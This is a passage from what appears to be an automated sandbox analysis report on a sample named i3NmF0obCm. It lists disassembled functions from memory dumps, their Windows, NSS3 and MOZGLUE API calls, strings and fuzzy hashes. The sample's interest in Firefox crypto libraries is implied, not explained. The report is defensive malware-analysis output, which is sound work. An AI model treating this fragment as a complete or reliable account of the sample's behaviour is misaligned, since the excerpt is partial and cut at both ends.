EnterCriticalSection.KERNEL32 ref: 6C618DFC
PR_Unlock.NSS3 ref: 6C618E2D
PR_SetError.NSS3 ref: 6C618E49

Memory Dump Source

Source File: 00000000.00000002.1884024642.000000006C571000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C570000, based on PE: true

Associated: 00000000.00000002.1884002609.000000006C570000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884228524.000000006C70F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884318765.000000006C74E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884378966.000000006C74F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884411344.000000006C750000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884430350.000000006C755000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c570000_i3NmF0obCm.jbxd

Similarity

API ID: CriticalEnterErrorSectionUnlockValue
String ID:
API String ID: 284873373-0
Opcode ID: 6358148f307efd9c7c4f717df5f72f76029c918f72d180c556757ed61eab2091
Instruction ID: 570b264ed3a83794f68f8e497c45822abc46ecfd9443ac4ea582806280badc9d
Opcode Fuzzy Hash: 6358148f307efd9c7c4f717df5f72f76029c918f72d180c556757ed61eab2091
Instruction Fuzzy Hash: 37118F75A096019BD700BF78C44819ABBF4FF49315F41496ADC88D7B00EB30E855CBC6

Function 6C69AC70 Relevance: 6.0, APIs: 4, Instructions: 49COMMON

Download Yara Rule

APIs

PR_DestroyMonitor.NSS3(000A34B6,00000000,00000678,?,6C685F17,?,?,?,?,?,?,?,?,6C68AAD4), ref: 6C69AC94
PK11_FreeSymKey.NSS3(08C483FF,00000000,00000678,?,6C685F17,?,?,?,?,?,?,?,?,6C68AAD4), ref: 6C69ACA6
free.MOZGLUE(20868D04,?,?,?,?,?,?,?,?,6C68AAD4), ref: 6C69ACC0
free.MOZGLUE(04C48300,?,?,?,?,?,?,?,?,6C68AAD4), ref: 6C69ACDB

Memory Dump Source

Source File: 00000000.00000002.1884024642.000000006C571000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C570000, based on PE: true

Associated: 00000000.00000002.1884002609.000000006C570000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884228524.000000006C70F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884318765.000000006C74E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884378966.000000006C74F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884411344.000000006C750000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884430350.000000006C755000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c570000_i3NmF0obCm.jbxd

Similarity

API ID: free$DestroyFreeK11_Monitor
String ID:
API String ID: 3989322779-0
Opcode ID: 053f2bdb87891bd88ca170d0a960880e67dcc776a3fda3513e5cbbd639185f39
Instruction ID: e3120e3ef2c31dec3ff50fd9101043efcd17665c2f0823fac62821920a8cb570
Opcode Fuzzy Hash: 053f2bdb87891bd88ca170d0a960880e67dcc776a3fda3513e5cbbd639185f39
Instruction Fuzzy Hash: B2014CB1B01B029BEB50EF29D908753B7E8BF0575AB104839D85AD7A01E731E458CB95

Function 00EF8740 Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 47stringCOMMON

Download Yara Rule

APIs

lstrcpy.KERNEL32(00000000,?), ref: 00EF8792
lstrcat.KERNEL32(00000000), ref: 00EF87A2

Strings

VF, xrefs: 00EF8757
VF, xrefs: 00EF8749

Memory Dump Source

Source File: 00000000.00000002.1859121240.0000000000EE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000000.00000002.1859096402.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859145624.0000000000EFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859163330.0000000000F04000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.0000000000F28000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.0000000000F86000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.000000000102A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.0000000001105000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859377166.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ee0000_i3NmF0obCm.jbxd

Yara matches

Similarity

API ID: lstrcatlstrcpy
String ID: VF$VF
API String ID: 3905823039-586278220
Opcode ID: c7775f74428df315ad66a2022c00b9a9559050cceb513e2abce6b06e4bfdf9c8
Instruction ID: 89a158206caf51ced634f28f4e273cc1472e11aa2d45c2b7a580dc9db0f151f1
Opcode Fuzzy Hash: c7775f74428df315ad66a2022c00b9a9559050cceb513e2abce6b06e4bfdf9c8
Instruction Fuzzy Hash: 5211E875E0020CEFCB08EF94D984AAEB3B9FF44300F108599E925AB395DB30AA44CF50

Function 6C6524E0 Relevance: 6.0, APIs: 4, Instructions: 46memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(0000FDE9,00000000,6C62C154,000000FF,00000000,00000000,00000000,00000000,?,?,6C62C154,?), ref: 6C6524FA
PORT_Alloc_Util.NSS3(00000000,?,6C62C154,?), ref: 6C652509

Part of subcall function 6C650BE0: malloc.MOZGLUE(6C648D2D,?,00000000,?), ref: 6C650BF8
Part of subcall function 6C650BE0: TlsGetValue.KERNEL32(6C648D2D,?,00000000,?), ref: 6C650C15

MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000000,00000000,?), ref: 6C652525
free.MOZGLUE(00000000), ref: 6C652532

Memory Dump Source

Source File: 00000000.00000002.1884024642.000000006C571000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C570000, based on PE: true

Associated: 00000000.00000002.1884002609.000000006C570000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884228524.000000006C70F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884318765.000000006C74E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884378966.000000006C74F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884411344.000000006C750000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884430350.000000006C755000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c570000_i3NmF0obCm.jbxd

Similarity

API ID: ByteCharMultiWide$Alloc_UtilValuefreemalloc
String ID:
API String ID: 929835568-0
Opcode ID: c44e6c6d98eaecfe8f2cce17031147a15cd7f8fc0bf6eb649cffba24d306589e
Instruction ID: 88a04f3c48e27cbb88c3bf239fef90197204a052bae32d3e96a1bc23fdff61d6
Opcode Fuzzy Hash: c44e6c6d98eaecfe8f2cce17031147a15cd7f8fc0bf6eb649cffba24d306589e
Instruction Fuzzy Hash: E9F096B270612137FA102A7A5C49E773AACEB427FDB640231BD28C66C0E951C81181F5

Function 6C680840 Relevance: 6.0, APIs: 4, Instructions: 45COMMON

Download Yara Rule

APIs

PR_CallOnce.NSS3(6C752F88,6C680660,00000020,00000000,?,?,6C682C3D,?,00000000,00000000,?,6C682A28,00000060,00000001), ref: 6C680860

Part of subcall function 6C574C70: TlsGetValue.KERNEL32(?,?,?,6C573921,6C7514E4,6C6BCC70), ref: 6C574C97
Part of subcall function 6C574C70: EnterCriticalSection.KERNEL32(?,?,?,?,6C573921,6C7514E4,6C6BCC70), ref: 6C574CB0
Part of subcall function 6C574C70: PR_Unlock.NSS3(?,?,?,?,?,6C573921,6C7514E4,6C6BCC70), ref: 6C574CC9

TlsGetValue.KERNEL32(00000020,00000000,?,?,6C682C3D,?,00000000,00000000,?,6C682A28,00000060,00000001), ref: 6C680874
EnterCriticalSection.KERNEL32(00000001), ref: 6C680884
PR_Unlock.NSS3 ref: 6C6808A3

Memory Dump Source

Source File: 00000000.00000002.1884024642.000000006C571000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C570000, based on PE: true

Associated: 00000000.00000002.1884002609.000000006C570000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884228524.000000006C70F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884318765.000000006C74E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884378966.000000006C74F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884411344.000000006C750000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884430350.000000006C755000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c570000_i3NmF0obCm.jbxd

Similarity

API ID: CriticalEnterSectionUnlockValue$CallOnce
String ID:
API String ID: 2502187247-0
Opcode ID: 30f8c9073cb0472e3a5ca597d9bcbf052f46267c176eb32ee4758c169b10c2f7
Instruction ID: 3cd97ae9855ea4630518eed7b3d8d797f74ec603bf9b42cd0112bea489b94b3b
Opcode Fuzzy Hash: 30f8c9073cb0472e3a5ca597d9bcbf052f46267c176eb32ee4758c169b10c2f7
Instruction Fuzzy Hash: 80014EB5E02244ABFF012F25FC449557738DB5731DF884975ED0862A42EF2294D48BF5

Function 6C680450 Relevance: 6.0, APIs: 4, Instructions: 38synchronizationCOMMON

Download Yara Rule

APIs

ReleaseMutex.KERNEL32(40C70845,?,6C684710,?,000F4240,00000000), ref: 6C68046B
GetLastError.KERNEL32(?,6C684710,?,000F4240,00000000), ref: 6C680479

Part of subcall function 6C69BF80: TlsGetValue.KERNEL32(00000000,?,6C68461B,-00000004), ref: 6C69C244

PR_Unlock.NSS3(40C70845,?,6C684710,?,000F4240,00000000), ref: 6C680492
PR_SetError.NSS3(FFFFE89D,00000000,?,6C684710,?,000F4240,00000000), ref: 6C6804A5

Memory Dump Source

Source File: 00000000.00000002.1884024642.000000006C571000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C570000, based on PE: true

Associated: 00000000.00000002.1884002609.000000006C570000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884228524.000000006C70F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884318765.000000006C74E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884378966.000000006C74F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884411344.000000006C750000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884430350.000000006C755000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c570000_i3NmF0obCm.jbxd

Similarity

API ID: Error$LastMutexReleaseUnlockValue
String ID:
API String ID: 4014558462-0
Opcode ID: 53b7b42ac9a8b72d80803daec493b7c9071e20be55a36a646c43e3151d2c81a0
Instruction ID: b60aaedc3215f3bf236d478bf014a74e06e1ba5f6132f968aa09abfc2297383e
Opcode Fuzzy Hash: 53b7b42ac9a8b72d80803daec493b7c9071e20be55a36a646c43e3151d2c81a0
Instruction Fuzzy Hash: 78F0BB70B47245EBEB00ABB59D18B5A32995F0230DF148835E80AC7991EA21D454857D

Function 6C70CC50 Relevance: 6.0, APIs: 4, Instructions: 29COMMON

Download Yara Rule

APIs

DeleteCriticalSection.KERNEL32(?), ref: 6C70CC61
free.MOZGLUE ref: 6C70CC6E
DeleteCriticalSection.KERNEL32(?), ref: 6C70CC80
free.MOZGLUE(?), ref: 6C70CC87

Memory Dump Source

Source File: 00000000.00000002.1884024642.000000006C571000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C570000, based on PE: true

Associated: 00000000.00000002.1884002609.000000006C570000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884228524.000000006C70F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884318765.000000006C74E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884378966.000000006C74F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884411344.000000006C750000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884430350.000000006C755000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c570000_i3NmF0obCm.jbxd

Similarity

API ID: CriticalDeleteSectionfree
String ID:
API String ID: 2988086103-0
Opcode ID: ea673f42865c05045c84a8b1a3e93493ae424eb19bd865bc529f28da9d15d9c5
Instruction ID: 6861118d5dd459d75418cf02d19226cb31a81126a71abc22a5cb1369427192d9
Opcode Fuzzy Hash: ea673f42865c05045c84a8b1a3e93493ae424eb19bd865bc529f28da9d15d9c5
Instruction Fuzzy Hash: 47E030767006089BCA10EFA8DC4488677ACEE4A2753154566E691C3700D231F905CBA1

Function 6C644D10 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 106COMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE001,00000000), ref: 6C644D57
PR_snprintf.NSS3(?,00000008,%d.%d,?,?), ref: 6C644DE6

Strings

%d.%d, xrefs: 6C644DDE

Memory Dump Source

Source File: 00000000.00000002.1884024642.000000006C571000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C570000, based on PE: true

Associated: 00000000.00000002.1884002609.000000006C570000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884228524.000000006C70F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884318765.000000006C74E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884378966.000000006C74F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884411344.000000006C750000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884430350.000000006C755000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c570000_i3NmF0obCm.jbxd

Similarity

API ID: ErrorR_snprintf
String ID: %d.%d
API String ID: 2298970422-3954714993
Opcode ID: f93f1acbd718e3ec2dcf9e0eab0a0cbd8c8f22f6f1d4cc6283c23e13333a7388
Instruction ID: 8d8a9d63d13f28992f6b64bdf47d579851389769875b2526f339a976047ee4d6
Opcode Fuzzy Hash: f93f1acbd718e3ec2dcf9e0eab0a0cbd8c8f22f6f1d4cc6283c23e13333a7388
Instruction Fuzzy Hash: F531FEB2D042186BEB109F659C02BFF77ACDF45308F058429ED1597781EB749905CBE9

Function 00EF6A70 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 60timeCOMMON

Download Yara Rule

APIs

Part of subcall function 00EF8560: lstrcpy.KERNEL32(00EFE4C7,00000000), ref: 00EF85A8

GetSystemTime.KERNEL32(?,01324BF8,00EFE129,?,?,?,?,?,?,?,?,?,00EE4643,?,00000014), ref: 00EF6A96

Strings

CF, xrefs: 00EF6AC1, 00EF6AF1, 00EF6AF4
CF, xrefs: 00EF6A7C, 00EF6AF5, 00EF6B00, 00EF6B14, 00EF6AE3, 00EF6B03

Memory Dump Source

Source File: 00000000.00000002.1859121240.0000000000EE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000000.00000002.1859096402.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859145624.0000000000EFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859163330.0000000000F04000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.0000000000F28000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.0000000000F86000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.000000000102A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.0000000001105000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859377166.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ee0000_i3NmF0obCm.jbxd

Yara matches

Similarity

API ID: SystemTimelstrcpy
String ID: CF$CF
API String ID: 62757014-1431344439
Opcode ID: 3095baf6d435dc323ff3ccde406c9329993201623f38b4b5cf61650e2aebb082
Instruction ID: 293a24fe5d81f81579c4ca23e9e2fbcbcc78cc35f8133b3597f629d1b85e6575
Opcode Fuzzy Hash: 3095baf6d435dc323ff3ccde406c9329993201623f38b4b5cf61650e2aebb082
Instruction Fuzzy Hash: 97114C72D0010CABCF09EFA8C9919FEB7B9AF58300F54D199E61677251EF706944CBA1

Function 6C664CF0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43COMMON

Download Yara Rule

APIs

SECOID_FindOIDByTag_Util.NSS3('8fl,00000000,00000000,?,?,6C663827,?,00000000), ref: 6C664D0A

Part of subcall function 6C650840: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C6508B4

SECITEM_ItemsAreEqual_Util.NSS3(00000000,00000000,00000000), ref: 6C664D22

Part of subcall function 6C64FD30: memcmp.VCRUNTIME140(?,AF840FC0,8B000000,?,6C5F1A3E,00000048,00000054), ref: 6C64FD56

Strings

'8fl, xrefs: 6C664D07

Memory Dump Source

Source File: 00000000.00000002.1884024642.000000006C571000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C570000, based on PE: true

Associated: 00000000.00000002.1884002609.000000006C570000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884228524.000000006C70F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884318765.000000006C74E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884378966.000000006C74F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884411344.000000006C750000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884430350.000000006C755000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c570000_i3NmF0obCm.jbxd

Similarity

API ID: Util$Equal_ErrorFindItemsTag_memcmp
String ID: '8fl
API String ID: 1521942269-1098522081
Opcode ID: 14028aa1c084b1134f31e0fe545c68cf4cce508ec734b29011f619df16d7203e
Instruction ID: 51b650a62c54891312981b47f1df39407bd1bd67b484c3650966d891f9fdd22b
Opcode Fuzzy Hash: 14028aa1c084b1134f31e0fe545c68cf4cce508ec734b29011f619df16d7203e
Instruction Fuzzy Hash: 73F06832A0112467DB108E6BDC50B5336DC9B427FDF140271DD18CBB81E6B1CC008697

Function 6C68AF70 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41COMMON

Download Yara Rule

APIs

PR_GetUniqueIdentity.NSS3(SSL), ref: 6C68AF78

Part of subcall function 6C5EACC0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C5EACE2
Part of subcall function 6C5EACC0: malloc.MOZGLUE(00000001), ref: 6C5EACEC
Part of subcall function 6C5EACC0: strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?), ref: 6C5EAD02
Part of subcall function 6C5EACC0: TlsGetValue.KERNEL32 ref: 6C5EAD3C
Part of subcall function 6C5EACC0: calloc.MOZGLUE(00000001,?), ref: 6C5EAD8C
Part of subcall function 6C5EACC0: PR_Unlock.NSS3 ref: 6C5EADC0
Part of subcall function 6C5EACC0: PR_Unlock.NSS3 ref: 6C5EAE8C
Part of subcall function 6C5EACC0: free.MOZGLUE(?), ref: 6C5EAEAB

memcpy.VCRUNTIME140(6C753084,6C7502AC,00000090), ref: 6C68AF94

Strings

SSL, xrefs: 6C68AF73

Memory Dump Source

Source File: 00000000.00000002.1884024642.000000006C571000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C570000, based on PE: true

Associated: 00000000.00000002.1884002609.000000006C570000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884228524.000000006C70F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884318765.000000006C74E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884378966.000000006C74F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884411344.000000006C750000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884430350.000000006C755000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c570000_i3NmF0obCm.jbxd

Similarity

API ID: Unlock$IdentityUniqueValuecallocfreemallocmemcpystrcpystrlen
String ID: SSL
API String ID: 2424436289-2135378647
Opcode ID: f49ccbc32fb62a54ca3dbad593faaa748be714791de0eeace66b57083c3c8268
Instruction ID: 971a565b8b55bcc75bf6ef7ed2e9c5f33161b04b7183918df130336dd6ecdb57
Opcode Fuzzy Hash: f49ccbc32fb62a54ca3dbad593faaa748be714791de0eeace66b57083c3c8268
Instruction Fuzzy Hash: DC217CB2306B48EEDA40DF11A947317BAB2F7866187905228C11E4BB3ADF3144589FF9

Function 6C5FC810 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36timeCOMMON

Download Yara Rule

APIs

CERT_CheckCertValidTimes.NSS3(?,00000000,-00000078,00000000,?,00000000,]_l,6C5F6499,-00000078,00000000,?,?,]_l,?,6C5F5DEF,?), ref: 6C5FC821

Part of subcall function 6C5F1DD0: DER_DecodeTimeChoice_Util.NSS3(?,?), ref: 6C5F1E0B
Part of subcall function 6C5F1DD0: DER_DecodeTimeChoice_Util.NSS3(?,?), ref: 6C5F1E24

SECKEY_DestroyPublicKey.NSS3(00000000,?,?,?,00000000,?,?,]_l,?,6C5F5DEF,?,?,?), ref: 6C5FC857

Strings

]_l, xrefs: 6C5FC810

Memory Dump Source

Source File: 00000000.00000002.1884024642.000000006C571000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C570000, based on PE: true

Associated: 00000000.00000002.1884002609.000000006C570000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884228524.000000006C70F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884318765.000000006C74E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884378966.000000006C74F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884411344.000000006C750000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884430350.000000006C755000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c570000_i3NmF0obCm.jbxd

Similarity

API ID: Choice_DecodeTimeUtil$CertCheckDestroyPublicTimesValid
String ID: ]_l
API String ID: 221937774-907858045
Opcode ID: 8b4586f9bf7fe022698438743c8cc7a435e02df9751e3daf09b6801118977999
Instruction ID: 635e6fa45c38361a2f0ac23cd6721a35256b149b906ceaf52abd0d8c71279464
Opcode Fuzzy Hash: 8b4586f9bf7fe022698438743c8cc7a435e02df9751e3daf09b6801118977999
Instruction Fuzzy Hash: AFF0A7B3A0011877EF1569656C04AFB3659DF81199F040031FE24D6641F722DD268BF5

Function 6C5E0F00 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16COMMON

Download Yara Rule

APIs

PR_GetPageSize.NSS3(6C5E0936,FFFFE8AE,?,6C5716B7,00000000,?,6C5E0936,00000000,?,6C57204A), ref: 6C5E0F1B

Part of subcall function 6C5E1370: GetSystemInfo.KERNEL32(?,?,?,?,6C5E0936,?,6C5E0F20,6C5E0936,FFFFE8AE,?,6C5716B7,00000000,?,6C5E0936,00000000), ref: 6C5E138F

PR_NewLogModule.NSS3(clock,6C5E0936,FFFFE8AE,?,6C5716B7,00000000,?,6C5E0936,00000000,?,6C57204A), ref: 6C5E0F25

Part of subcall function 6C5E1110: calloc.MOZGLUE(00000001,0000000C,?,?,?,?,?,?,?,?,?,?,6C5E0936,00000001,00000040), ref: 6C5E1130
Part of subcall function 6C5E1110: strdup.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?,?,6C5E0936,00000001,00000040), ref: 6C5E1142
Part of subcall function 6C5E1110: PR_GetEnvSecure.NSS3(NSPR_LOG_MODULES,?,?,?,?,?,?,?,?,?,?,?,?,?,6C5E0936,00000001), ref: 6C5E1167

Strings

clock, xrefs: 6C5E0F20

Memory Dump Source

Source File: 00000000.00000002.1884024642.000000006C571000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C570000, based on PE: true

Associated: 00000000.00000002.1884002609.000000006C570000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884228524.000000006C70F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884318765.000000006C74E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884378966.000000006C74F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884411344.000000006C750000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884430350.000000006C755000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c570000_i3NmF0obCm.jbxd

Similarity

API ID: InfoModulePageSecureSizeSystemcallocstrdup
String ID: clock
API String ID: 536403800-3195780754
Opcode ID: 0414676268a2589c9c7692cfa32c4281cd877c3d5031564993e06a17c2e453e2
Instruction ID: da924a08335f7e5368f1c9d7bd6d8bc079b9b98fa1d1855c9d8f26d48d066f17
Opcode Fuzzy Hash: 0414676268a2589c9c7692cfa32c4281cd877c3d5031564993e06a17c2e453e2
Instruction Fuzzy Hash: 44D02232A0020492C20023579C44B9BB6ACC7CB2BAF000836E00C01E014F2884DAD2A5

Function 6C650DB0 Relevance: 5.1, APIs: 4, Instructions: 97COMMON

Download Yara Rule

APIs

calloc.MOZGLUE ref: 6C650DF5
TlsGetValue.KERNEL32 ref: 6C650E2D
TlsGetValue.KERNEL32 ref: 6C650E58
TlsGetValue.KERNEL32 ref: 6C650E84

Memory Dump Source

Source File: 00000000.00000002.1884024642.000000006C571000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C570000, based on PE: true

Associated: 00000000.00000002.1884002609.000000006C570000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884228524.000000006C70F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884318765.000000006C74E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884378966.000000006C74F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884411344.000000006C750000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884430350.000000006C755000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c570000_i3NmF0obCm.jbxd

Similarity

API ID: Value$calloc
String ID:
API String ID: 3339632435-0
Opcode ID: b2efd646cd2848c18c6a75c6ad3a526444035f0a099aa6a58a09941789384de9
Instruction ID: a3a02d001b6bdf3803109096cb4d8237183e8831ac86a393263f41c54e08cef5
Opcode Fuzzy Hash: b2efd646cd2848c18c6a75c6ad3a526444035f0a099aa6a58a09941789384de9
Instruction Fuzzy Hash: 893180B0B45391CBDB106F7889452A977B4BF4930DFB1467AD88887A11DF34C4A6CB85

Function 6C5AA4E0 Relevance: 5.1, APIs: 4, Instructions: 75stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,6C5AA468,00000000), ref: 6C5AA4F9
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,6C5AA468,00000000), ref: 6C5AA51B
strlen.API-MS-WIN-CRT-STRING-L1-1-0(6C5AA468,?,6C5AA468,00000000), ref: 6C5AA545
memcpy.VCRUNTIME140(00000001,6C5AA468,00000001,?,?,?,6C5AA468,00000000), ref: 6C5AA57D

Memory Dump Source

Source File: 00000000.00000002.1884024642.000000006C571000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C570000, based on PE: true

Associated: 00000000.00000002.1884002609.000000006C570000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884228524.000000006C70F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884318765.000000006C74E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884378966.000000006C74F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884411344.000000006C750000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884430350.000000006C755000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c570000_i3NmF0obCm.jbxd

Similarity

API ID: strlen$memcpy
String ID:
API String ID: 3396830738-0
Opcode ID: 600eb8a033a5ca9a43437b08be08586c367961074f3215d643a34829541b8b4a
